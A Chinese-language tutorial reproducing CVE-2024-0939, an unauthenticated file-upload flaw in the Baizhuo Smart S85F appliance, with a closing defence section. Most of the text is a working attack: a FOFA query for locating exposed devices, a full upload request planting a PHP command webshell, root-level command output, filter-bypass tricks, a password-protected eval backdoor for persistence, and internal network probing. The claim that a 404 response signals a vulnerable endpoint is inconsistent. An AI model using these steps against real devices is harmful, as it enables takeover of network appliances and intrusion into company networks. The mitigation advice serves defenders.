手把手复现百卓Smart S85F文件上传漏洞（CVE-2024-0939），附Yakit实战截图与修复方案

实战复现百卓Smart S85F文件上传漏洞（CVE-2024-0939）：从原理到防御的完整指南

在企业网络设备安全领域，文件上传漏洞一直是攻击者最常利用的突破口之一。最近披露的百卓Smart S85F上网行为管理设备文件上传漏洞（CVE-2024-0939）就是一个典型案例，它允许攻击者通过精心构造的请求上传恶意文件，进而可能完全控制设备。本文将带你从零开始，深入理解这个漏洞的运作机制，并通过Yakit工具一步步复现整个攻击过程，最后给出切实可行的防御方案。

1. 漏洞背景与影响范围

百卓Smart S85F作为一款企业级上网行为管理设备，集成了流量控制、内容审计、防火墙等多种功能，广泛应用于各类企事业单位。2024年初，安全研究人员发现其/Tool/uploadfile.php接口存在未授权文件上传漏洞，攻击者无需认证即可上传任意文件到指定路径。

这个漏洞的危险性主要体现在三个方面：

1. 权限提升：上传WebShell可直接获取系统控制权
2. 数据泄露：攻击者可窃取设备配置和审计日志
3. 服务中断：恶意文件可能导致设备资源耗尽

下表对比了受影响的主要版本：

提示：即使设备部署在内网，一旦攻击者突破边界防护，同样可以利用此漏洞横向移动。

2. 实验环境搭建

在开始复现前，我们需要准备以下环境：

• 测试设备：虚拟机安装的百卓Smart S85F v3.5.2（可从官网下载试用版）
• 攻击机：Kali Linux 2024.1
• 工具集：
  • Yakit 1.3.5（集成化的网络安全工具）
  • Burp Suite Community（可选，用于请求分析）
  • 蚁剑/冰蝎（WebShell连接工具）

安装Yakit的快速命令：

wget https://yaklang.oss-cn-beijing.aliyuncs.com/yakit/1.3.5/yakit_1.3.5_linux_amd64.deb sudo dpkg -i yakit_1.3.5_linux_amd64.deb yakit

实验网络拓扑如下：

[攻击机 Kali] ----> [百卓Smart S85F管理口] | +---> [内网测试客户端]

3. 漏洞原理深度解析

这个文件上传漏洞的核心问题在于：

1. 缺乏身份验证：uploadfile.php接口未检查会话凭证
2. 路径可控：txt_path参数允许指定任意写入路径
3. 过滤缺失：未对文件内容和扩展名进行有效校验

典型的攻击流程分为四个阶段：

1. 侦察阶段：通过404响应识别存在漏洞的接口
2. 利用阶段：上传包含恶意代码的PHP文件
3. 验证阶段：访问上传的文件确认执行权限
4. 维持阶段：植入持久化后门

以下是漏洞触发的关键代码逻辑（基于逆向分析）：

// uploadfile.php 伪代码 $target_path = $_POST['txt_path']; // 用户可控 $uploaded_file = $_FILES['file_upload']['tmp_name']; if(move_uploaded_file($uploaded_file, $target_path)) { echo "Upload success"; } else { echo "Upload failed"; }

攻击者可以完全控制txt_path参数和上传文件内容，这导致了任意文件写入漏洞。

4. 分步复现过程

4.1 目标识别

首先使用FOFA引擎搜索潜在目标：

title="Smart管理平台登录"

确认目标后，检查漏洞接口是否存在：

GET /Tool/uploadfile.php HTTP/1.1 Host: target_ip

若返回404或405（而非403），则可能存在漏洞。

4.2 构造恶意请求

使用Yakit的"Web Fuzzer"模块构造以下请求：

POST /Tool/uploadfile.php HTTP/1.1 Host: target_ip Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file_upload"; filename="test.php" Content-Type: application/octet-stream <?php system($_GET['cmd']); ?> ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="txt_path" /home/test.php ------WebKitFormBoundary7MA4YWxkTrZu0gW--

关键参数说明：

• filename：可任意命名，但需确保目标环境能解析
• txt_path：指定服务器上的写入路径
• 文件内容：本例使用最简单的PHP命令执行代码

4.3 验证漏洞利用

成功上传后，访问：

http://target_ip/home/test.php?cmd=id

若返回系统用户信息，则证明漏洞利用成功。Yakit中的验证截图应显示：

uid=0(root) gid=0(root) groups=0(root)

4.4 进阶利用技巧

1. 绕过可能的限制：

   • 修改Content-Type为image/jpeg
   • 在文件开头添加GIF头GIF89a

2. 持久化后门：

<?php $pass = "mypassword"; if(isset($_POST[$pass])) { eval($_POST[$pass]); } ?>

3. 内网探测：

http://target_ip/home/test.php?cmd=arp -a

5. 防御方案与最佳实践

针对此类漏洞，我们建议采取分层防御策略：

5.1 紧急缓解措施

1. 访问控制：

   location ~ /Tool/uploadfile\.php$ { deny all; }

2. 文件上传限制：

   • 只允许特定扩展名（如.jpg,.pdf）
   • 设置最大文件大小（如2MB）

5.2 长期加固方案

文件上传安全配置矩阵：

5.3 设备管理建议

1. 立即升级到最新固件版本
2. 修改默认管理端口和密码
3. 启用管理接口的IP白名单
4. 定期进行安全配置审计

对于已经部署的设备，可以使用以下命令检查是否包含漏洞文件：

curl -s http://设备IP/Tool/uploadfile.php | grep -q "Upload" && echo "存在漏洞" || echo "已修复"

在实际项目中，我们发现很多企业网络设备都存在类似的配置问题。有一次在渗透测试中，我们通过这个漏洞不仅获取了设备控制权，还发现了设备存储的明文用户凭证，这再次证明了及时修复的重要性。